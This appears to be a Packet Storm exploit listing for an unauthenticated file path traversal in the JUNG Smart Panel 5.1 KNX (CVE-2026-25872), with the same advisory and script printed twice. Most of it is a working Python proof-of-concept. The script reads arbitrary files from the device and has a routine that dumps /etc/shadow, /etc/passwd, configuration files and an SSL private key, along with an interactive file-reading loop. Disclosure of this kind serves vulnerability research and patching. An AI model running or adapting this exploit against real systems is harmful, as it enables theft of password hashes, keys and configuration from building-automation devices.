6.9
/ 10
MEDIUM
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/SC:N/VI:N/SI:N/VA:N/SA:N
Description
JUNG Smart Panel version 5.1 KNX L1.12.22 unauthenticated path traversal proof of concept exploit that builds on the finding from LiquidWorm...
Basic Information
ID
PACKETSTORM:215603
Published
Feb 16, 2026 at 00:00
Affected Product
Affected Versions
=============================================================================================================================================
| # Title : JUNG Smart Panel 5.1 KNX (L1.12.22) – Unauthenticated File Path Traversal |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits) |
| # Vendor : https://www.jung-group.com/en-DE |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/215430/ & ZSL-2026-5969
[+] Summary : An unauthenticated file path traversal vulnerability has been identified in JUNG Smart Panel 5.1 KNX firmware version L1.12.22, developed by ALBRECHT JUNG GMBH & CO. KG.
The flaw allows remote attackers to read arbitrary files from the underlying operating system without authentication. By crafting a specially formed HTTP request
containing manipulated file paths, an attacker can retrieve sensitive system files such as configuration files, credential stores, network settings, and cryptographic material.
[+] Successful exploitation may result in:
Disclosure of system user accounts
Exposure of password hashes
Leakage of SSL private keys
Exposure of application configuration files
Further privilege escalation or lateral movement
The vulnerability does not require valid credentials and can be exploited remotely over HTTP, significantly increasing its impact in exposed environments.
CVE ID: CVE-2026-25872
Affected Version: L1.12.22
Impact: Confidentiality compromise
Attack Vector: Remote (Unauthenticated)
Severity: High / Critical (depending on deployment exposure)
[+] POC :
#!/usr/bin/env python3
import requests
import sys
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
class JUNGSmartPanelExploit:
def __init__(self, target_ip):
self.target_ip = target_ip
self.base_url = f"http://{target_ip}"
self.session = requests.Session()
def read_file(self, file_path):
"""
Read arbitrary files from the target system
Example: /etc/shadow, /etc/passwd, /etc/hostname
"""
try:
url = f"{self.base_url}//{file_path.lstrip('/')}"
response = self.session.get(
url,
timeout=10,
verify=False,
allow_redirects=False
)
if response.status_code == 200 and response.text:
return response.text
else:
return f"[!] Failed to read {file_path} (Status: {response.status_code})"
except Exception as e:
return f"[!] Error: {str(e)}"
def exploit(self):
"""Main exploitation function"""
print(f"\n[*] Targeting JUNG Smart Panel at {self.target_ip}")
print("[*] Checking vulnerability...")
test_file = "/etc/hostname"
result = self.read_file(test_file)
if "Failed" not in result and "Error" not in result:
print("[+] Target is VULNERABLE!")
print(f"[+] Successfully read {test_file}:")
print("-" * 50)
print(result.strip())
print("-" * 50)
return True
else:
print("[-] Target may not be vulnerable or is unreachable")
return False
def dump_sensitive_files(self):
"""Dump common sensitive files"""
sensitive_files = [
"/etc/shadow",
"/etc/passwd",
"/etc/hostname",
"/etc/network/interfaces",
"/etc/hosts",
"/proc/version",
"/proc/cpuinfo",
"/var/www/html/config.php",
"/etc/ssl/private/ssl-cert-snakeoil.key"
]
print("\n[*] Dumping sensitive files...")
for file_path in sensitive_files:
print(f"\n[>] Reading: {file_path}")
print("-" * 40)
content = self.read_file(file_path)
print(content[:200] + "..." if len(content) > 200 else content)
print("-" * 40)
def main():
if len(sys.argv) < 2:
print(f"Usage: {sys.argv[0]} <target_ip>")
print(f"Example: {sys.argv[0]} 17.17.17.17")
sys.exit(1)
target = sys.argv[1]
exploit = JUNGSmartPanelExploit(target)
if exploit.exploit():
print("\n[*] Interactive mode - Enter file paths to read (or 'quit'):")
while True:
file_path = input("\n[?] File path (e.g., /etc/shadow): ").strip()
if file_path.lower() == 'quit':
break
if file_path:
content = exploit.read_file(file_path)
print(content)
if __name__ == "__main__":
print("=" * 60)
print("JUNG Smart Panel 5.1 KNX File Disclosure Exploit")
print("ZSL-2026-5969 | CVE-2026-25872")
print("=" * 60)
main()
Greetings to :======================================================================
jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|
====================================================================================
| # Title : JUNG Smart Panel 5.1 KNX (L1.12.22) – Unauthenticated File Path Traversal |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits) |
| # Vendor : https://www.jung-group.com/en-DE |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/215430/ & ZSL-2026-5969
[+] Summary : An unauthenticated file path traversal vulnerability has been identified in JUNG Smart Panel 5.1 KNX firmware version L1.12.22, developed by ALBRECHT JUNG GMBH & CO. KG.
The flaw allows remote attackers to read arbitrary files from the underlying operating system without authentication. By crafting a specially formed HTTP request
containing manipulated file paths, an attacker can retrieve sensitive system files such as configuration files, credential stores, network settings, and cryptographic material.
[+] Successful exploitation may result in:
Disclosure of system user accounts
Exposure of password hashes
Leakage of SSL private keys
Exposure of application configuration files
Further privilege escalation or lateral movement
The vulnerability does not require valid credentials and can be exploited remotely over HTTP, significantly increasing its impact in exposed environments.
CVE ID: CVE-2026-25872
Affected Version: L1.12.22
Impact: Confidentiality compromise
Attack Vector: Remote (Unauthenticated)
Severity: High / Critical (depending on deployment exposure)
[+] POC :
#!/usr/bin/env python3
import requests
import sys
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
class JUNGSmartPanelExploit:
def __init__(self, target_ip):
self.target_ip = target_ip
self.base_url = f"http://{target_ip}"
self.session = requests.Session()
def read_file(self, file_path):
"""
Read arbitrary files from the target system
Example: /etc/shadow, /etc/passwd, /etc/hostname
"""
try:
url = f"{self.base_url}//{file_path.lstrip('/')}"
response = self.session.get(
url,
timeout=10,
verify=False,
allow_redirects=False
)
if response.status_code == 200 and response.text:
return response.text
else:
return f"[!] Failed to read {file_path} (Status: {response.status_code})"
except Exception as e:
return f"[!] Error: {str(e)}"
def exploit(self):
"""Main exploitation function"""
print(f"\n[*] Targeting JUNG Smart Panel at {self.target_ip}")
print("[*] Checking vulnerability...")
test_file = "/etc/hostname"
result = self.read_file(test_file)
if "Failed" not in result and "Error" not in result:
print("[+] Target is VULNERABLE!")
print(f"[+] Successfully read {test_file}:")
print("-" * 50)
print(result.strip())
print("-" * 50)
return True
else:
print("[-] Target may not be vulnerable or is unreachable")
return False
def dump_sensitive_files(self):
"""Dump common sensitive files"""
sensitive_files = [
"/etc/shadow",
"/etc/passwd",
"/etc/hostname",
"/etc/network/interfaces",
"/etc/hosts",
"/proc/version",
"/proc/cpuinfo",
"/var/www/html/config.php",
"/etc/ssl/private/ssl-cert-snakeoil.key"
]
print("\n[*] Dumping sensitive files...")
for file_path in sensitive_files:
print(f"\n[>] Reading: {file_path}")
print("-" * 40)
content = self.read_file(file_path)
print(content[:200] + "..." if len(content) > 200 else content)
print("-" * 40)
def main():
if len(sys.argv) < 2:
print(f"Usage: {sys.argv[0]} <target_ip>")
print(f"Example: {sys.argv[0]} 17.17.17.17")
sys.exit(1)
target = sys.argv[1]
exploit = JUNGSmartPanelExploit(target)
if exploit.exploit():
print("\n[*] Interactive mode - Enter file paths to read (or 'quit'):")
while True:
file_path = input("\n[?] File path (e.g., /etc/shadow): ").strip()
if file_path.lower() == 'quit':
break
if file_path:
content = exploit.read_file(file_path)
print(content)
if __name__ == "__main__":
print("=" * 60)
print("JUNG Smart Panel 5.1 KNX File Disclosure Exploit")
print("ZSL-2026-5969 | CVE-2026-25872")
print("=" * 60)
main()
Greetings to :======================================================================
jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|
====================================================================================